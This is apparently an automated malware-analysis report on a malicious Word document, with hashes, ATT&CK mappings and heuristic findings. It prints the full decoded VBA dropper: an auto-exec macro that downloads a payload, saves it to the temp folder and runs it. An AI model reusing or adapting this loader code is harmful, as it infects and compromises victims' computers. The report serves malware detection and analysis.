Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8503712d549d2f0f…

MALICIOUS

Office (OLE)

45.0 KB Created: 2017-09-27 22:36:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 6a93714124fcf4cb35fa459bb7166972 SHA-1: b2d4c9fc9c343765ddd1fed21fca284736db98b5 SHA-256: 8503712d549d2f0f7ce369a22961ffba591b0d8f766cd7bd8d920967e93471d3
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1036.005 Masquerading: Match Legitimate Name or Location

The sample contains obfuscated VBA macros designed to execute automatically upon opening the document. Critical heuristics indicate that the VBA code downloads a file from an embedded URL and executes it, likely as a second-stage payload. The obfuscation and download-execute behavior are strong indicators of malicious intent.

Heuristics 9

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10178 bytes
SHA-256: 2e424df6eaf2dfaa5b6ad3349598805d3ffb5cf1ab168b7c94ac81296768f34b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
45 of 88 identifiers look randomly generated (e.g. 'SvVvgsFrlBFOMPTKXpPXCJCKl') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wXuyQD").Value <> "yolo" Then
SlbXxVyyHeBrskJcBvSxcRITl
ActiveDocument.Variables("wXuyQD").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "RisioCV"
Private Function DNvFQksVvu(sFhiZmBXeg As Variant, hkpuWxBqrE As Integer)
Dim VuWInWOQHZ, xxOyfGcwMe As String, CTRBizosjQ, VaKobBBMTv
xxOyfGcwMe = ActiveDocument.Variables("wXuyQD").Value()
VuWInWOQHZ = ""
CTRBizosjQ = 1
While CTRBizosjQ < UBound(sFhiZmBXeg) + 2
VaKobBBMTv = CTRBizosjQ Mod Len(xxOyfGcwMe): If VaKobBBMTv = 0 Then VaKobBBMTv = Len(xxOyfGcwMe)
VuWInWOQHZ = VuWInWOQHZ + Chr(Asc(Mid(xxOyfGcwMe, VaKobBBMTv + hkpuWxBqrE, 1)) Xor CInt(sFhiZmBXeg(CTRBizosjQ - 1)))
CTRBizosjQ = CTRBizosjQ + 1
Wend
DNvFQksVvu = VuWInWOQHZ
End Function
Function MmbOAtxextHtZGBPECnnwvPel(kfcKDiyDtDThbTJekXWCsRhJb, WgkEGxbzBoXEbGLgrgmGFPpch)
AxytWKgKokKUdnneUwTwvJgcR = kfcKDiyDtDThbTJekXWCsRhJb.Items
For OWjQuNHJLXscrkfpgapRDrrgR = 0 To kfcKDiyDtDThbTJekXWCsRhJb.Count - 1
If AxytWKgKokKUdnneUwTwvJgcR(OWjQuNHJLXscrkfpgapRDrrgR) = WgkEGxbzBoXEbGLgrgmGFPpch Then
MmbOAtxextHtZGBPECnnwvPel = True
Exit For
End If
Next
MmbOAtxextHtZGBPECnnwvPel = False
End Function
Dim bxRiElaeQvRXBNGnaFGjwfbJm
Sub rqXUQfNbTIMRtyppMqmOSHkvB()
Dim vcDddGwdlsmvFOhmFRDuQdDRm
Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set dPpuQjBcGmbEXdYahaccmddob = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 45, 45, 21, 34, 95, 46, 13, 21, 40, 26), 0))
Dim IHOjWxSdqTagfSmMymycwcuSe: IHOjWxSdqTagfSmMymycwcuSe = 0
Dim SaZMETGnObJFvwwyZsXdIRDpa: SaZMETGnObJFvwwyZsXdIRDpa = ""
Dim uHevxtKKuiSSzmOVAKLaZPioV: uHevxtKKuiSSzmOVAKLaZPioV = ""
On Error Resume Next
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 37, 15, 13, _
44, 28, 31, 1, 7, 11, 20, 28, 112, 55, 20, 3, 35, 57, 49, 60, 11, 29, 49, 47, _
8, 21), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 3, 38, 50, _
23, 33, 63, 13, 34, 49, 31, 5, 101, 59, 14, 59, 12, 34, 9, 40, 14, 14, 51, 2, _
23, 34), 0))
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const dCqUlTTtIgxrTPPMLtNsIQTFf = &H80000003
xBkzjDZSgJsmmEJNtvDxOYUaL = DNvFQksVvu(Array(69), 0)
Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
11, 1, 24, 6, 29, 29, 24, 75, 7, 58, 17, 60, 57, 53, 6, 42, 23, 34, 83, 60, _
66, 40, 6), 0) _
& xBkzjDZSgJsmmEJNtvDxOYUaL & DNvFQksVvu(Array(55, 10, 27, 25, 26, 11, 5, 60, 45, 39, 28, 40, 2, 108, 101, 53, 7, 38, 63, 4, 18, _
22, 0, 34), 0))
uBcpRCqjntTUeLjijfZzAatnD = ""
PMFuSKVNGVoPRbHdBmpqEzNjr.EnumKey dCqUlTTtIgxrTPPMLtNsIQTFf, uBcpRCqjntTUeLjijfZzAatnD, sQENbjrDlsCSrslEMAoVLhgZX
For Each QylTGyrFWucaDlsHZADvDRUKn In sQENbjrDlsCSrslEMAoVLhgZX
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
23, 23, 12, 123, 4, 55, 51, 52, 44, 32, 46, 41, 34, 20, 28, 1, 46, 5, 54, 51, _
40, 11, 15, 54, 8), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
49, 62, 51, 64, 57, 23, 63, 17, 22, 43, 55, 60, 46, 14, 36, 46, 53, 61, 34, 54, _
59, 9, 34, 41, 63), 0))
If Not MmbOAtxextHtZGBPECnnwvPel(dPpuQjBcGmbEXdYahaccmddob, uHevxtKKuiSSzmOVAKLaZPioV) Then
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set bxRiElaeQvRXBNGnaFGjwfbJm = dPpuQjBcGmbEXdYahaccmddob
Set vcDddGwdlsmvFOhmFRDuQdDRm = Nothing
End Sub
Function YjYdLWRvwTbgNyxJurVoCmQfT(MRkXboNAfYFWdVPWuxRZtGhNI, SvVvgsFrlBFOMPTKXpPXCJCKl, jMBxWxrXssxuIkGzQiKSQratt, riUNWjDIzOELpPwvcmcjCMkZa)
On Error Resume Next
Dim XMChsfNKHVQniAhVXJMJOLPbT
Set XMChsfNKHVQniAhVXJMJOLPbT = CreateObject(DNvFQksVvu(Array(38, 11, 12, 27, 2, 101, 79, 10, 46, 52, 31, 33, 4, 14, 123, 13, 43, 32, 14, 51, 108, _
82, 65, 100), 0))
If Err.Number <> 0 Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
Err.Clear
Exit Function
End If
Dim ErIvgrGUTuHXMPzAmejKGjMGU: ErIvgrGUTuHXMPzAmejKGjMGU = 0
Do While ErIvgrGUTuHXMPzAmejKGjMGU < UBound(jMBxWxrXssxuIkGzQiKSQratt)
Err.Clear
AxytWKgKokKUdnneUwTwvJgcR = bxRiElaeQvRXBNGnaFGjwfbJm.Items
For qvOdZTkyhJvZIIeTrBVuCaqKW = -1 To bxRiElaeQvRXBNGnaFGjwfbJm.Count - 1
Err.Clear
rujCcoXqvOcvVNWgcacaVtOze = jMBxWxrXssxuIkGzQiKSQratt(ErIvgrGUTuHXMPzAmejKGjMGU) & riUNWjDIzOELpPwvcmcjCMkZa
XMChsfNKHVQniAhVXJMJOLPbT.setOption 2, 13056
XMChsfNKHVQniAhVXJMJOLPbT.setTimeouts 0, 0, 0, 0
XMChsfNKHVQniAhVXJMJOLPbT.Open MRkXboNAfYFWdVPWuxRZtGhNI, rujCcoXqvOcvVNWgcacaVtOze, False
If qvOdZTkyhJvZIIeTrBVuCaqKW <> -1 Then
XMChsfNKHVQniAhVXJMJOLPbT.setProxy 2, AxytWKgKokKUdnneUwTwvJgcR(qvOdZTkyhJvZIIeTrBVuCaqKW), ""
End If
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 16, 21, 4, 29, 50, 21), 0), DNvFQksVvu(Array(30, 12, 18, 91, 86), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 24, 11, 52, 21, 48, 36, 40), 0), DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0), DNvFQksVvu(Array(88, 72, 68), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 2, 11, 57, 21, 116, 31, 63, 25, 33), 0), DNvFQksVvu(Array(10, 8, 4, 26, 7, 52, 0, 45, 34, 41, 7, 107, 14, 123, 65, 54, 20, 89, 60, 12, 48, _
9, 66, 33, 17, 7, 29, 26, 21, 1, 51, 4, 61), 0)
XMChsfNKHVQniAhVXJMJOLPbT.Send (SvVvgsFrlBFOMPTKXpPXCJCKl)
If XMChsfNKHVQniAhVXJMJOLPbT.ReadyState <> 4 Then
XMChsfNKHVQniAhVXJMJOLPbT.WaitForResponse 30
End If
If Err.Number = 0 Then
If XMChsfNKHVQniAhVXJMJOLPbT.Status = 200 Then
If XMChsfNKHVQniAhVXJMJOLPbT.StatusText = DNvFQksVvu(Array(36, 51), 0) Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Exit Function
End If
End If
End If
Next
ErIvgrGUTuHXMPzAmejKGjMGU = ErIvgrGUTuHXMPzAmejKGjMGU + 1
Loop
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
End Function
Sub HFrkveFgejmygVlsXhAOcnSPx(jrFWnTBceRnkTVqSUzeczwRwe, SsuzikMLBesCbOGBzsJCzdtwf)
Set hpdXRaICBrMidysNqWZvKUKvp = CreateObject(DNvFQksVvu(Array(42, 60, 59, 50, 44, 121, 50, 45, 57, 35, 8, 41), 0))
hpdXRaICBrMidysNqWZvKUKvp.Open
hpdXRaICBrMidysNqWZvKUKvp.Type = 1
If IsEmpty(jrFWnTBceRnkTVqSUzeczwRwe) Then
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
Exit Sub
End If
hpdXRaICBrMidysNqWZvKUKvp.Write jrFWnTBceRnkTVqSUzeczwRwe
hpdXRaICBrMidysNqWZvKUKvp.Position = 0
hpdXRaICBrMidysNqWZvKUKvp.SaveToFile SsuzikMLBesCbOGBzsJCzdtwf
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
End Sub
Sub SlbXxVyyHeBrskJcBvSxcRITl()
On Error Resume Next
Dim CyIZJzUpHiMUQXCqfyyLedgCP(), euEvLXdRrPZPHrgjUzJJvTeYI, tLmgYQsmxrfyqFHvGJTxWguUN, orZFdNDAWAWXpavOWxzpbBuwp
ReDim CyIZJzUpHiMUQXCqfyyLedgCP(1)
rqXUQfNbTIMRtyppMqmOSHkvB
Set tLmgYQsmxrfyqFHvGJTxWguUN = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set orZFdNDAWAWXpavOWxzpbBuwp = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 47, 45, 26, 51, 101, 56, 16, 0, 63, 14, 13, _
6, 5, 49, 0, 31), 0)).GetSpecialFolder(2)
euEvLXdRrPZPHrgjUzJJvTeYI = DNvFQksVvu(Array(18, 23, 24, 25, 64, 50, 25, 60), 0)
orZFdNDAWAWXpavOWxzpbBuwp = orZFdNDAWAWXpavOWxzpbBuwp & DNvFQksVvu(Array(55), 0) & euEvLXdRrPZPHrgjUzJJvTeYI
CyIZJzUpHiMUQXCqfyyLedgCP(0) = DNvFQksVvu(Array(3, 12, 0, 6, 84, 120, 78, 46, 60, 49, 71, 41, 23, 53, 68, 46, 16, 27, 60, 23, 108, _
3, 30, 123), 0)
UDRLgTLOgzgBjhNHSljHQryNY = YjYdLWRvwTbgNyxJurVoCmQfT(DNvFQksVvu(Array(44, 61, 32), 0), "", CyIZJzUpHiMUQXCqfyyLedgCP, DNvFQksVvu(Array(17, 87, 22, 25, 26, 121, 4, 33, 46), 0))
HFrkveFgejmygVlsXhAOcnSPx UDRLgTLOgzgBjhNHSljHQryNY, orZFdNDAWAWXpavOWxzpbBuwp
tLmgYQsmxrfyqFHvGJTxWguUN.Run (orZFdNDAWAWXpavOWxzpbBuwp)
End Sub